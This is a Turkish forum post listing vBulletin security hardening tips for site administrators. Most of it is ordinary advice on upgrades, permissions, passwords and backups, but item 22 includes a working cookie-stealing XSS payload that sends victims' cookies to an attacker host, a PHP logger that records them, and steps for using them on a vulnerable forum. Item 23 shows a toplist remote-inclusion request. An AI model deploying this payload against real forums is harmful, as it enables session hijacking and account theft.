İPUCU

Vbulletin Vbulletin hakkında soru ve cevaplar, bilgi paylaşımları.
Crack, null vbulletin dosya paylaşımı yasaktır.

Seçenekler

vBulletin Güvenlik Açıkları ve Kapatma Yöntemleri [Tüm Sürümler]

21-06-2015 00:15
#1
'RuLing - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2015
Mesajlar:
2.736
Teşekkür (Etti):
742
Teşekkür (Aldı):
905
Konular:
1309
Ticaret:
(0) %


-- vbulletin güvenlik açıkları ve kapatma Yöntemleri --

1- İlk olarak her zaman için forumunuzu son çıkan vbulletin sürümüne upgrade edin daha güvenlidir.

2-Herhangi bi eklentide php dosyası veya php dosyalarında editleme varsa iyice dikkat edin sonradan açık teşkil edebilir.

3-Ftp nize girin ve tüm dosyalarının chmod değerlerinin 777 olmamasına dikkat edin çünkü fso ile serverınıza girilirse hacklenmeyin adam yazma hakkı bulamaz kurtulmuş olursunuz.

4- Config.php dosyanızı mutlaka kriptolayınki herhangi bi fso ile girildiğinde sql bağlantı için kimse okuyamasın.

5- Eğer phpmyadmin kullanıyorsanız phpmyadmin adresinizin şifreli olduğundan emin olun değilse şifreleyin.

6- Admincp ve modcp klasörlerinizin ismini değiştirin vede şifreleyin o klasörleri.

7-Çok basit şifreler kullanmayın şifrelerinizde &%+/ gibi özel karekterlerin olmasına özen gösterin

8-Trojen yerseniz mutlaka hemen format atın ve tüm ftp +panel v.s şifrelerinizi değiştirin

9-Forumu kurduktan sonra mutlaka install klasörünü silin sadece install.php yi değil zaten herhangi bir işlevi olmıyan klasör komple silin ileriki zamanlarda açık teşkil etmesin.

10-Mutlaka hergün sitenizin yedeğini alın herhangi bi sorunla karşılaşırsanız yedeği geri yükleyip ufak bir zararla atlatırsınız.

11- Calender(Takvim) i silin biri oraya Hacked by ****** gibisinden bişeyler ekliyerek lamerlik yapabilir.

12-Shoutbox kullanıyorsanız mutlaka html ve images ları kapatın bunlar açık teşkil ediyorlar.

13-Eğer yedeği ftp nize yollayıp ordan bilgisayarınıza çekiyorsanız yedek aldıktan sonra mutlaka ftp nizden silin çünkü yedek alınması için klasörün chmod u 777 dir ve isteyen herkez yedeği bilgisayarına indirebilir.

14- imzada html kodlarını kapatın bu yöntemle xss veya yönlendirme yapılabilir.

15- Üye olurken mutlaka resim doğrulaması olsun eğer hostunuzdan doğan bir image sorunu varsa herhangi zorunlu bir ek bilgi ekleyinki siteniz flood saldırısına maruz kalmasın.

16- Herhangi bi konuda TIKLA gibisinden yazılara direk tıklamayın önce sağ tıklayıp özelliklerden linke bakın ondan sonra tıklayın.

17-Özel mesajlarda çok özelliğin açık olmasına gerek yok cookieslerinizin güvenliği açısından özel mesajdaki özellikleri kapatın image v.s

18-Yeni kullanıcı grup eklerken bu uye grubu halka acık olsunmu seçeneğini mutlaka hayır yapın diğer kullanıcılar bu grubu seçemesin.

19-Eğer null sürüm kullanıyorsanız dosyalara dikkat edin null iken kişi sizin bilgilerinize ulaşmak için açık kapı bırakmış olabilir ör: 3.5.3 sürümündeki sm-check.php dosyası.

20-eğer topx kullanıyor kullanıyorsanız yönlendirme yemediğinden emin olun herhangi biri indexine yönlendirebilir [Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...] örneğin burdaki kod o yüzden eğer topx iniz yönlendirme yiyosa yönlendirme kodundaki kelimeleri sansürleyin vede en garanti yol olarak açıksız topx ler var onu kullanın

21-Eğer toplistinizi eklenti olarak kullanıyosanız html kodlarının kapalı olmasına dikkat edin çünkü yönlendirme koduyla indexe yönlendirilebilir.

22- Gelelim eklentiden doğan xss açığına
Notepad ile yeni bir dosya açıp aşağıdaki kodu içine yapıştırın ve testmagic.pdf olarak kaydedin.

Code:

**********
d o c u m e n t.write('<img src="http://host adresiniz/c.php?c='+********.cookie+'" WIDTH=0 HEIGHT=0>');
********.********.href="https://www.google.com/adsense/testmagic.pdf";
</script>
Aşağıdakini de c.php olarak kaydedip bir host a atın.


Code:

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("m/d/Y g:i:s a");
$referer= getenv ('HTTP_REFERER');
$fl = fopen('megalog.txt', 'a');
fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer."\n".$cookie."\n");
fclose($fl);
?>
Nasıl kullanılacağına geçelim :

vbulletin 3.5.4 kullanan bir foruma üye olup mesajımızı yazıyoruz. daha sonra yazdığımız mesaja testmagic.pdf i ekliyoruz. eğer o sitede açık varsa mesajı gören kullanıcıların cookie si hostunuzdaki log.txt e kaydedilecek.

Kodlardaki bazı adresler yerine biliyorsunuz ki kendi adreslerinizi yazacaksınız.Bu açık sadece IE kullananlarda geçerlidir.

işte eklentiden doğan xss açığı böyle kapatmak için pdf türü eklentiyi silmelisiniz.

23-Diğer vbulletin toplist açığıda şöyle [url="http://www.hedefsite.com/toplist/sources/join.php?FORM"][Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...][Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]?
bu şekilde biri sitenize fso ile uzaktan bağlantı kurabilir bunun için join.php deki FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path] kodunu silmeniz gerekmektedir.


> vBuLLetin güvenlik Önlemleri <


1 : vBulletin kurulum bittikten sonra " install " klasörünü tamamen FTP den silin.

2 : Config Editleyerek Kendinizi güvenliğe alın ..

FTP den config.php yi indirin ve notepad yardımı ile açın.

Burada kullanıcı id numaranızı yazın.

Kod:
$config['SpecialUsers']['undeletableusers'] = ' id numaranı yaz ';
Eğer bunu yapariseniz şifreniz çalındıgında kullanıcı adınız bile değişmez..

3 : Admin & Moderatör panellerini saklayın.

FTP den " admincp " " modcp " isimlerini değiştirin.

http://www.siteadi.com/forum/birincicp
http://www.siteadi.com/forum/ikincicp

Gibi değiştirin..

Değişiklikleri yaptık config.php yi notepad yardımı ile açıyoruz.


Kod:
$config['Misc']['admincpdir'] = 'admincp'; 
$config['Misc']['modcpdir'] = 'modcp'; 
Bunun yerine şöyle yazıyoruz.
Kod:
$config['Misc']['admincpdir'] = 'birincicp'; 
$config['Misc']['modcpdir'] = 'ikincicp';
Not : Birincicp ve ikincicp olan yerleri istediginiz ismi veriniz...ftp'de ismi degistirmeyi unutmayiniz...

Buda tamamdır. Devam edelim.

4 : PaneLLere Şifre Koyun.


:::::BİRKAC GENEL BİLGİ ::::::

1: Forumunuzu daima en yüksek sürümlere upgrade edin.

2: Tools.php dosyasının (vB3) websitenizde bulunmadığından emin olun. Bu dosya kesinlikle upload edilmemelidir. İşi bittikten sonra silinmelidir.

3: phpMyAdmin kullanıyorsanız, giriş kısmının şifrelendiğinden emin olun. Aksi taktirde herkes ulaşabilir.

4: Herhangi bir saldırıdan sonra tüm cpanel, FTP ve admin şifrelerinizi değiştirin.

5: Admin ve mod şifrelerinin en az 9-10 karakter olmasına, bu karakterlerin sayı ve harflerden oluşmasına dikkat edin. Şifreleriniz MD5 şeklinde şifrelendiği için hem harf hemde rakamla oluşan 10 karakterli bir şifrenin çözülmesi imkasız bile olabilir.

6: FORUMUNUZDA ASLA HTML KULLANIMINA İZİN VERMEYİN.

7: Sitenizi sağlam hostlara kurun. Forumunuz ne kadar güvenli olursa olsun hostunuz saldırı yediği zaman sizde etkileneceksiniz.

8: Sık sık DATABASE yedeği alın. Bazı Hosting firmaları her gün yedek alım işlemlerini gerçekleştirmektedir. Ben ayda 8-9 kez yedek alıyorum. Böylece saldırı yiyip, tablolara ve foruma herhangi bir zarar gelirse 1-2 günlik zararlıkları atlatıyorum.



Plugin eklenti fln yüklemeyin diyorlar bence yanlış

Eklentilerde sadece php dosyası olan eklentilere dikkat ediniz.
Bazıları o php dosyalarına değişik kodlar ekleyebilir... bilginize. sağlam yerlerden alır iseniz sorun yok.

Sıfır bi vBulletin hacklemek oldukça zordur. Ama serverınızda açık var ise istediği kadar zor olsun Serverınıza dikkat edin.
Kullanıcı İmzası
The End


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı